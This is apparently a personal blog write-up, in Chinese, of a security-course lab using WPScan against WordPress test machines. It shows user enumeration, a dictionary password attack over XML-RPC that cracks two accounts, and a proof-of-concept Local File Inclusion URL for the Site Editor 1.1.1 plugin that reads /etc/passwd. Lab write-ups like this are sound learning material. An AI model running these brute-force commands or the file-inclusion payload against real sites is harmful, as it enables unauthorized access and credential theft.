Automattic與WP Engine撕破臉，禁止WP Engine存取WordPress資源
WordPress.org 解除 WP Engine 封锁，暂时缓解安全风险

WordPress是非常普遍的架站用工具但我其實沒用過，架站機對於我的使用經驗是:
phpbb2 --> Moodle --> Drupal

既然是很多人在使用的架站工具，那麼出一套專門打他的檢測工具也不奇怪吧!

wpscan掃描套件

久久沒有打開會先出現更新的通知

┌──(kali㉿kali)-[~]
└─$ wpscan --url 172.16.x.x -e ap,at,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

--url 指定要掃描的目標 IP 地址。
-e：這個參數用於啟用不同類型的枚舉（enumeration）。
vp : 嘗試識別其中可能存在漏洞的插件(Vulnerable Plugins)。
ap：枚舉所有的插件（all plugins）。
at：枚舉所有的主題（all themes）。
u：枚舉所有的用戶（users）。

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.16.x.x/xmlrpc.php

[+] WordPress readme found: http://172.16.x.x/readme.html

[+] WordPress version 5.2.12 identified (Insecure, released on 2021-09-09).

[+] twentynineteen
 | [!] The version is out of date, the latest version is 2.9

[+] twentyseventeen
 | [!] The version is out of date, the latest version is 3.7
 
 
[i] User(s) Identified:

[+] alvin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jason
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] james
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

從版本號當中找0日漏洞
[+] WordPress version 5.2.12

wpscan破解密碼

┌──(kali㉿kali)-[~]
└─$ wpscan --url 172.16.x.x -U 'alvin,jason,john,james,tom' -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://172.16.x.x/ [172.16.x.x]
[+] Started: Tue Oct  1 04:05:09 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%


[+] WordPress version 5.2.12 identified (Insecure, released on 2021-09-09).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://172.16.x.x/, Match: '-release.min.js?ver=5.2.12'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://172.16.x.x/, Match: 'WordPress 5.2.12'


[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - john / iloveyou
[SUCCESS] - alvin / apollo
Trying jason / pic Time: 00:12:13 <> (33085 / 500499)  6.61%  ETA: 02:52:49s Time: 00:12:13 <> (330^Cying jason / 21041988 Time: 00:14:18 <=                  > (39235 / 500499)  7.83%  ETA: 02:48:07
[!] Valid Combinations Found:
 | Username: john, Password: iloveyou
 | Username: alvin, Password: apollo

把前面找到的帳號給加進來就不用浪費時間: -U 'alvin,jason,john,james,tom'
利用字典檔去猜密碼: -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt

這裡利用了兩個參數，字典檔這件事則是我一直想不透的地方。如果細看可以發現其實我猜了兩組密碼花了14分鐘後自己把它停下來的，因為可能猜到100000個密碼都是過還是沒找到，100000個密碼是重點如果字典檔沒有就找不到。其實我有去問講師，這裡最關鍵的還是怎麼建立自己的字典檔!就跟前面我們怎麼樣去建立自己的SOP那樣，所以我覺得很難參透!畢竟誰還會用1qaz@WSX這種那大家都在用的密碼?還不如去社交工程比較有效率。

如果對100000組密碼覺得很難想像，如果你對於自己的密碼是否外洩感到有疑慮的話，蒐集了過去數年間外洩的近 5 億筆資料並且架了一個網站讓你可以試試自己的密碼是否已經外洩。
「Have I been pwned？」
';--have i been pwned?

如果真的不小心密碼中了，有以下建議可以參考:

1. 使用複雜密碼
2. 密碼不共用
3. 常更換密碼

前面的例子其實沒有找到套件的漏洞，所以我這裡再找另一台WordPress靶機來示範。

┌──(kali㉿kali)-[~]
└─$ wpscan --url 172.16.x.x --api-token '' -e vp
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://172.16.x.x/ [172.16.x.6x]
[+] Started: Tue Oct  1 18:20:33 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.18.0 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://172.16.x.x/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%


[i] Plugin(s) Identified:

[+] site-editor
 | Location: http://172.16.x.x/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - https://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://172.16.x.x/wp-content/plugins/site-editor/readme.txt

這裡我把其他用不到的結果全部刪掉，當時我可是認真的每一條結果都去找exploit然後試過一遍，真的需要很多的熱情和耐心。我自己找到有用的套件漏洞是site-editor Version: 1.1.1，可以參考WordPress Plugin Site Editor 1.1.1 - Local File Inclusion。

** Proof of Concept **
http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd